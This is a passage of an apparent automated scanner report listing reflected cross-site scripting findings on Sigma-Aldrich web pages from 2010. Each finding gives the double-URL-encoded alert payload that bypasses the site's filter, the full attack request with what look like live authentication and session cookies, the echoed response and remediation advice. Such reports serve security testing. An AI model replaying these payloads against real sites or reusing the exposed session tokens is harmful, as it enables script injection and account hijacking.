bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:48 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest42f4a";alert(1)//cc9d2f2abe8/analytical-chromatography/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.80. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd50%2522%253balert%25281%2529%252f%252f8a5dab69c77 was submitted in the REST URL parameter 4. This input was echoed as abd50";alert(1)//8a5dab69c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatographyabd50%2522%253balert%25281%2529%252f%252f8a5dab69c77/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:50 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatographyabd50";alert(1)//8a5dab69c77/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.81. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51566%2522%253balert%25281%2529%252f%252facbc8230b3 was submitted in the REST URL parameter 5. This input was echoed as 51566";alert(1)//acbc8230b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog51566%2522%253balert%25281%2529%252f%252facbc8230b3 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:52 GMT
Content-Length: 29002
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog51566";alert(1)//acbc8230b3","E404") ;
   </script>
...[SNIP]...

1.82. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e6a2%2522%253balert%25281%2529%252f%252fa640488014b was submitted in the REST URL parameter 1. This input was echoed as 1e6a2";alert(1)//a640488014b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content1e6a2%2522%253balert%25281%2529%252f%252fa640488014b/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:52 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content1e6a2";alert(1)//a640488014b/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.83. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c9b8%2522%253balert%25281%2529%252f%252ff71090fe4b5 was submitted in the REST URL parameter 2. This input was echoed as 1c9b8";alert(1)//f71090fe4b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich1c9b8%2522%253balert%25281%2529%252f%252ff71090fe4b5/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich1c9b8";alert(1)//f71090fe4b5/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem","E404") ;
   </script>
...[SNIP]...

1.84. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b90ad%2522%253balert%25281%2529%252f%252f854402a9ab3 was submitted in the REST URL parameter 3. This input was echoed as b90ad";alert(1)//854402a9ab3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interestb90ad%2522%253balert%25281%2529%252f%252f854402a9ab3/analytical-chromatography/fluka-analytical/customware-oem HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
